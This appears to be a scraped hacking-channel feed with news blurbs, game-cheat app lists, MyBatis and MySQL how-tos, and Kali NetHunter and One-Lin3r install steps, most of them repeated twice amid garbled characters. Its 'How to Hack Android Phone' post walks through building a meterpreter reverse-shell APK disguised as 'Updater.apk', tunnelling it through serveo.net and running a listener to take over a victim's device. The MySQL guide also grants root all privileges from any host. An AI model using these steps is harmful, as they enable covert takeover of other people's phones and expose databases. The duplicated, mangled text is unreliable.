Forwarded from UNDERCODE NEWS
The winner of the biggest Sberbank-classified Microsoft program in the history of state procurement has been decided.
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ GAMES HACKING ANDROID& IOS :
1) Xmodgames
2) HackerBot
3) Cheat Engine
4) Nox
5) Bluestacks
6) GameCih
7) Using Mods with Private Servers
8) File Manager
9) Lucky Patcher (Root/No Root)
10) Creehack
11) SB Game Hacker
12) LeoPlay Card
13) Game Killer
14) Game Guardian
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ GAMES HACKING ANDROID& IOS :
1) Xmodgames
2) HackerBot
3) Cheat Engine
4) Nox
5) Bluestacks
6) GameCih
7) Using Mods with Private Servers
8) File Manager
9) Lucky Patcher (Root/No Root)
10) Creehack
11) SB Game Hacker
12) LeoPlay Card
13) Game Killer
14) Game Guardian
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Kaspersky asked Putin to quickly transfer banks and government agencies to Russian software.
#international
#international
Forwarded from UNDERCODE NEWS
Microsoft continues to improve the Chromium browser core is beneficial to the entire browser industry.
#Updates
#Updates
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦for pro hackers Detailed explanation of MyBatis query method with parameters :
{}Placeholder
Similar to the way of operating through PreparedStatement in jdbc, the position of the required parameter in the SQL statement will be occupied by ?, and then the parameter will be bound by the passed in parameter. ? All bindings are values, and you cannot specify the columns of the table. When converted to sql, the table name will be treated as a string, which will cause errors to prevent sql injection.
select username,age,password from 'tb_user'
Simple type parameter
Simple types refer to: basic data types, packaging types, String, java.sql.*. When the parameter is a simple type, MyBatis will ignore the number of parameters in the SQL statement and the name of the placeholder, and then automatically bind the parameter. The parameterType attribute can define the type of the parameter. If defined, the parameter type must be required when passing the parameter. It is consistent with the specified type, otherwise ClassCastException is thrown.
<select id="selBaseType" resultType="pojo.User" parameterType="java.lang.Integer">
select * from tb_users where id=#{id}
</select>
User user=sqlSession.selectOne("selBaseType",1);
Map type parameters
When the parameter is a Map collection, the #{} in the SQL statement should write the key value of the Map collection. MyBatis will find only the value through the key and then bind the parameters. If the key does not exist, no error will be reported, and null will be used for parameter binding.
<select id="selByMap" resultType="pojo.User">
select * from tb_users where username=#{username} and password=#{password}
</select>
Map<String,String> map=new HashMap<>();
map.put("username","zhangsan");
map.put("password","123456");
User user=sqlSession.selectOne("selByMap",map);
Object type parameter passing
When the parameter is an object type, the property name corresponding to the getter method of the object should be written in #{} in the SQL statement. When the getter method does not exist, an exception is thrown.
<select id="selByObject" resultType="pojo.User">
select * from tb_users where username=#{username} and password=#{password}
</select>
User user1=new User();
user1.setUsername("lisi");
user1.setPassword("123456");
User user=sqlSession.selectOne("selByObject",user1);
${}
Similar to the way of operating through Statement in jdbc, the passed parameters and SQL statements are directly connected to the string. Generally used when the structure of the SQL statement is uncertain.
When the table name is uncertain, the condition is uncertain, and the sorting rule is uncertain, #{} cannot be used, and ${} should be replaced. For simple data types, you should try to use #{} to avoid errors.
${} needs to add'' to the incoming parameter to become a string, otherwise it will be treated as a column name.
select * from tb_users where username='${username}' and password='${password}'
If ${123} will be used as an integer number replacement placeholder, the parameter passed in is invalid at this time.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦for pro hackers Detailed explanation of MyBatis query method with parameters :
{}Placeholder
Similar to the way of operating through PreparedStatement in jdbc, the position of the required parameter in the SQL statement will be occupied by ?, and then the parameter will be bound by the passed in parameter. ? All bindings are values, and you cannot specify the columns of the table. When converted to sql, the table name will be treated as a string, which will cause errors to prevent sql injection.
select username,age,password from 'tb_user'
Simple type parameter
Simple types refer to: basic data types, packaging types, String, java.sql.*. When the parameter is a simple type, MyBatis will ignore the number of parameters in the SQL statement and the name of the placeholder, and then automatically bind the parameter. The parameterType attribute can define the type of the parameter. If defined, the parameter type must be required when passing the parameter. It is consistent with the specified type, otherwise ClassCastException is thrown.
<select id="selBaseType" resultType="pojo.User" parameterType="java.lang.Integer">
select * from tb_users where id=#{id}
</select>
User user=sqlSession.selectOne("selBaseType",1);
Map type parameters
When the parameter is a Map collection, the #{} in the SQL statement should write the key value of the Map collection. MyBatis will find only the value through the key and then bind the parameters. If the key does not exist, no error will be reported, and null will be used for parameter binding.
<select id="selByMap" resultType="pojo.User">
select * from tb_users where username=#{username} and password=#{password}
</select>
Map<String,String> map=new HashMap<>();
map.put("username","zhangsan");
map.put("password","123456");
User user=sqlSession.selectOne("selByMap",map);
Object type parameter passing
When the parameter is an object type, the property name corresponding to the getter method of the object should be written in #{} in the SQL statement. When the getter method does not exist, an exception is thrown.
<select id="selByObject" resultType="pojo.User">
select * from tb_users where username=#{username} and password=#{password}
</select>
User user1=new User();
user1.setUsername("lisi");
user1.setPassword("123456");
User user=sqlSession.selectOne("selByObject",user1);
${}
Similar to the way of operating through Statement in jdbc, the passed parameters and SQL statements are directly connected to the string. Generally used when the structure of the SQL statement is uncertain.
When the table name is uncertain, the condition is uncertain, and the sorting rule is uncertain, #{} cannot be used, and ${} should be replaced. For simple data types, you should try to use #{} to avoid errors.
${} needs to add'' to the incoming parameter to become a string, otherwise it will be treated as a column name.
select * from tb_users where username='${username}' and password='${password}'
If ${123} will be used as an integer number replacement placeholder, the parameter passed in is invalid at this time.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦kaliLinux on android in few steps:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg install wget
2) wget -O install-nethunter-termux https://offs.ec/2MceZWr
3) chmod +x install-nethunter-termux
4) ./install-nethunter-termux
F E A T U R E S :
features
Kali NetHunter app
The main screen is a panel of general information, network interfaces and the status of the HID device.
Kali Chroot Manager - for managing chroot metapackage installations.
Kali Services - start / stop various chrooted services. Enable or disable them at boot time.
Custom Commands - Add your own commands and functions to the launcher.
MAC Changer - change the Wi-Fi MAC address (only on certain devices)
KeX Manager - Set up an instant VNC session with your Kali chroot.
USB Arsenal - Manage USB Gadgets Configurations
HID [Attacks] - Various HID attacks, Teensy style.
DuckHunter HID - Rubber Ducky Hidden Attacks
BadUSB MITM Attack
MANA Wireless Toolkit - Configure a malicious hotspot with one click.
MITM..
π¦kaliLinux on android in few steps:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg install wget
2) wget -O install-nethunter-termux https://offs.ec/2MceZWr
3) chmod +x install-nethunter-termux
4) ./install-nethunter-termux
F E A T U R E S :
features
Kali NetHunter app
The main screen is a panel of general information, network interfaces and the status of the HID device.
Kali Chroot Manager - for managing chroot metapackage installations.
Kali Services - start / stop various chrooted services. Enable or disable them at boot time.
Custom Commands - Add your own commands and functions to the launcher.
MAC Changer - change the Wi-Fi MAC address (only on certain devices)
KeX Manager - Set up an instant VNC session with your Kali chroot.
USB Arsenal - Manage USB Gadgets Configurations
HID [Attacks] - Various HID attacks, Teensy style.
DuckHunter HID - Rubber Ducky Hidden Attacks
BadUSB MITM Attack
MANA Wireless Toolkit - Configure a malicious hotspot with one click.
MITM..
Forwarded from UNDERCODE NEWS
83% of Chrome users do not update despite Google's successive zero-day announcement.
#Vulnerabilities #international
#Vulnerabilities #international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MySQL8.0 method to set remote access permissions:
1. Log in to MySQL
mysql -u root -p
Enter your password
2. Choose mysql database
use mysql;
Because the user table of user information is stored in the mysql database.
3. View the relevant information of the current root user in the user table of the mysql database
select host, user, authentication_string, plugin from user;
After executing the above command, a table will be displayed
Check the host of the root user in the table. The default localhost should be displayed, which only supports local access and does not allow remote access.
4. Authorize all permissions of the root user and set up remote access
GRANT ALL ON *.* TO 'root'@'%';
GRANT ALL ON means all permissions,% means that all hosts are wildcarded and can access remotely.
5. Refresh permissions
After all operations should be performed
flush privileges;
6. View the host of the root user
Perform step 2 again, you will find that the root user's host has become %, indicating that our modification has been successful and can be accessed remotely.
7. Access the database
There are many visualization tools for remote access to the database, such as Navicat, SQLyog, MySQL workbench, etc
Enter the host and password for access, and a 2059 error is reported. This is because the encryption rules of MySql8.0 version and 5.0 are different, and the current visualization tool only supports the old encryption method.
There are two ways to solve this problem, one is to update Navicat driver to solve this problem, the other is to modify the encryption rule of MySQL user login to mysql_native_password, the first method I tried did not work, I use the second method Kind of method.
8. Modify encryption rules
ALTER USER 'root'@'localhost' IDENTIFIED BY 'password' PASSWORD EXPIRE NEVER;
password is your current password.
9. Update root user password
ALTER USER 'root'@'%' IDENTIFIED WITH mysql_native_password BY 'password';
password is your newly set password.
10. Refresh permissions
FLUSH PRIVILEGES;
OK, the setting is complete, use Navicat again to connect to the database
So far, this article on the method of setting remote access permissions for MySQL 8.0 is introduced.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MySQL8.0 method to set remote access permissions:
1. Log in to MySQL
mysql -u root -p
Enter your password
2. Choose mysql database
use mysql;
Because the user table of user information is stored in the mysql database.
3. View the relevant information of the current root user in the user table of the mysql database
select host, user, authentication_string, plugin from user;
After executing the above command, a table will be displayed
Check the host of the root user in the table. The default localhost should be displayed, which only supports local access and does not allow remote access.
4. Authorize all permissions of the root user and set up remote access
GRANT ALL ON *.* TO 'root'@'%';
GRANT ALL ON means all permissions,% means that all hosts are wildcarded and can access remotely.
5. Refresh permissions
After all operations should be performed
flush privileges;
6. View the host of the root user
Perform step 2 again, you will find that the root user's host has become %, indicating that our modification has been successful and can be accessed remotely.
7. Access the database
There are many visualization tools for remote access to the database, such as Navicat, SQLyog, MySQL workbench, etc
Enter the host and password for access, and a 2059 error is reported. This is because the encryption rules of MySql8.0 version and 5.0 are different, and the current visualization tool only supports the old encryption method.
There are two ways to solve this problem, one is to update Navicat driver to solve this problem, the other is to modify the encryption rule of MySQL user login to mysql_native_password, the first method I tried did not work, I use the second method Kind of method.
8. Modify encryption rules
ALTER USER 'root'@'localhost' IDENTIFIED BY 'password' PASSWORD EXPIRE NEVER;
password is your current password.
9. Update root user password
ALTER USER 'root'@'%' IDENTIFIED WITH mysql_native_password BY 'password';
password is your newly set password.
10. Refresh permissions
FLUSH PRIVILEGES;
OK, the setting is complete, use Navicat again to connect to the database
So far, this article on the method of setting remote access permissions for MySQL 8.0 is introduced.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
A Super SIM card will be launched by China Mobile: it can be used as a meal card, door card and large transfers
#Technologies #Updates
#Technologies #Updates
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Hack Android Phone Using Another Android Phone?
YOU NEED :
1). Android 5.0 (or later. Tutorial for older versions will be published shortly ...)
2). TermuX Android App (Download from Play Store)
3). Installed Metasploit Framework in TermuX (tutorial here)
4). Active internet / WiFi connection
five). TermuX must be allowed to use external storage (just enter this command at once: "termux-setup-storage")
6). MiXplorer (download the APK file from UpToDown to sign the APK)
7). MiX Signer (APK Signer for MiXplorer, download it from the Play store)
π¦Step 1 port forwarding
Many people use NGROK for port forwarding. But in NGROK you can see that it will create a new domain or port when you reconnect to it. The reserved domain and port are unfortunately only available to paid or their premium customers. That's why for NGROK you have to generate a new APK every time you start hacking.
BUT HERE ... we will be using Serveo. In Serveo, you can manually forward the desired port on the internet (and you can forward it again in the future). To use Serveo port forwarding, you must install the OpenSSH package for TermuX. To do this, enter this command in TermuX:
pkg install openssh
- It will install OpenSSH successfully
Once installed, just enter this:
ssh -R (Desired_Port): localhost: (Desired_Port) serveo.net
- Details below
It might ask you about the default ssh or something like that. Just enter yes when he asks about it.
There are some points to keep in mind here; If you want to redirect the HTTP port, then select different ports in both Desired_Port fields. But here we will redirect the TCP port. To forward a TCP port, you must enter the same desired ports in the Desired_Ports field. Also don't change "localhost". Here we are going to forward TCP port: 4564 (for example only). After forwarding
π¦Step 2 Build an APK with an embedded payload
To generate an APK with an embedded payload, enter this command in the NEW SESSION:
msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = 4564 R
> Storage / Downloads / Updater.apk
- The link to Updater.apk is in the next third paragraph
Wait a minute ...
Ok ... Now the APK file with the embedded payload is successfully generated here: Phone / SD card storage -> Downloads -> Updater.apk
(OPTIONAL) You can use APK Editor Pro to change the name (default: MainActivity) and version of the generated APK file.
(Remember: This APK is not signed! You must sign it before using it to avoid problems.)
π¦Step 3: Signing the newly generated APK file
To sign the newly generated APK file,
Open MiXplorer File Manager and navigate to "Un-Signed APK File (Updater.apk)" (will be in your downloads folder).
Long press on "Un-Signed APK File (Updater.apk)" and select "MENU button" in the upper right corner of MiXplorer, then select "SIGN".
It will display various options for signing the APK (but "AUTO" is preferred).
Select AUTO to automatically and successfully sign the APK file.
Your APK file: (filename) -signed.apk is now successfully signed and fully functional and is 9.9KB in size.
π¦Step 4 Configuring Metasploit in TermuX
Activate the Metasploit Framework in TermuX by entering this command in a new session:
msfconsole
- Metasploit Framework Console
mkdir -p $ PREFIX / var / lib / postgresql
initdb $ PREFIX / var / lib / postgresql
pg_ctl -D $ PREFIX / var / lib / postgresql start
- Thanks to DUST WORLD for this fix ... !!!
Wait a minute ...
Now that msfconsole starts, type the following (bold) commands, one by one, carefully:
msf> use exploit / multi / handler
msf> install payload android / meterpreter / reverse_tcp
msf> install LHOST localhost
msf> install LPORT 4564
msf> exploit -j -z
- enter only bold commands
Step 5. Installing the APK on the victim's Android device.
sessions -i (session id)
- (Session ID) = 1, 2, 3, 4 or 5 ...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Hack Android Phone Using Another Android Phone?
YOU NEED :
1). Android 5.0 (or later. Tutorial for older versions will be published shortly ...)
2). TermuX Android App (Download from Play Store)
3). Installed Metasploit Framework in TermuX (tutorial here)
4). Active internet / WiFi connection
five). TermuX must be allowed to use external storage (just enter this command at once: "termux-setup-storage")
6). MiXplorer (download the APK file from UpToDown to sign the APK)
7). MiX Signer (APK Signer for MiXplorer, download it from the Play store)
π¦Step 1 port forwarding
Many people use NGROK for port forwarding. But in NGROK you can see that it will create a new domain or port when you reconnect to it. The reserved domain and port are unfortunately only available to paid or their premium customers. That's why for NGROK you have to generate a new APK every time you start hacking.
BUT HERE ... we will be using Serveo. In Serveo, you can manually forward the desired port on the internet (and you can forward it again in the future). To use Serveo port forwarding, you must install the OpenSSH package for TermuX. To do this, enter this command in TermuX:
pkg install openssh
- It will install OpenSSH successfully
Once installed, just enter this:
ssh -R (Desired_Port): localhost: (Desired_Port) serveo.net
- Details below
It might ask you about the default ssh or something like that. Just enter yes when he asks about it.
There are some points to keep in mind here; If you want to redirect the HTTP port, then select different ports in both Desired_Port fields. But here we will redirect the TCP port. To forward a TCP port, you must enter the same desired ports in the Desired_Ports field. Also don't change "localhost". Here we are going to forward TCP port: 4564 (for example only). After forwarding
π¦Step 2 Build an APK with an embedded payload
To generate an APK with an embedded payload, enter this command in the NEW SESSION:
msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = 4564 R
> Storage / Downloads / Updater.apk
- The link to Updater.apk is in the next third paragraph
Wait a minute ...
Ok ... Now the APK file with the embedded payload is successfully generated here: Phone / SD card storage -> Downloads -> Updater.apk
(OPTIONAL) You can use APK Editor Pro to change the name (default: MainActivity) and version of the generated APK file.
(Remember: This APK is not signed! You must sign it before using it to avoid problems.)
π¦Step 3: Signing the newly generated APK file
To sign the newly generated APK file,
Open MiXplorer File Manager and navigate to "Un-Signed APK File (Updater.apk)" (will be in your downloads folder).
Long press on "Un-Signed APK File (Updater.apk)" and select "MENU button" in the upper right corner of MiXplorer, then select "SIGN".
It will display various options for signing the APK (but "AUTO" is preferred).
Select AUTO to automatically and successfully sign the APK file.
Your APK file: (filename) -signed.apk is now successfully signed and fully functional and is 9.9KB in size.
π¦Step 4 Configuring Metasploit in TermuX
Activate the Metasploit Framework in TermuX by entering this command in a new session:
msfconsole
- Metasploit Framework Console
mkdir -p $ PREFIX / var / lib / postgresql
initdb $ PREFIX / var / lib / postgresql
pg_ctl -D $ PREFIX / var / lib / postgresql start
- Thanks to DUST WORLD for this fix ... !!!
Wait a minute ...
Now that msfconsole starts, type the following (bold) commands, one by one, carefully:
msf> use exploit / multi / handler
msf> install payload android / meterpreter / reverse_tcp
msf> install LHOST localhost
msf> install LPORT 4564
msf> exploit -j -z
- enter only bold commands
Step 5. Installing the APK on the victim's Android device.
sessions -i (session id)
- (Session ID) = 1, 2, 3, 4 or 5 ...
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Many Vulnerabilities has been patched in Vmware, could allow an attacker to exploit all system.
#Vulnerabilities
#Vulnerabilities
Forwarded from UNDERCODE NEWS
Suddenly, Huawei's commercial desktop PC is here! Want to move the cake?
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Updated windows hacking
One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) For Linux Debian-based distros. (Ex: Kali, Ubuntu..):
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo apt install libncurses5-dev
3) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
B) For the rest Linux distros.:
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
F E A T U R E S ::
It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Updated windows hacking
One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) For Linux Debian-based distros. (Ex: Kali, Ubuntu..):
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo apt install libncurses5-dev
3) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
B) For the rest Linux distros.:
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
F E A T U R E S ::
It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - D4Vinci/One-Lin3r: Gives you one-liners that aids in penetration testing operations, privilege escalation and more
Gives you one-liners that aids in penetration testing operations, privilege escalation and more - D4Vinci/One-Lin3r
Forwarded from UNDERCODE NEWS
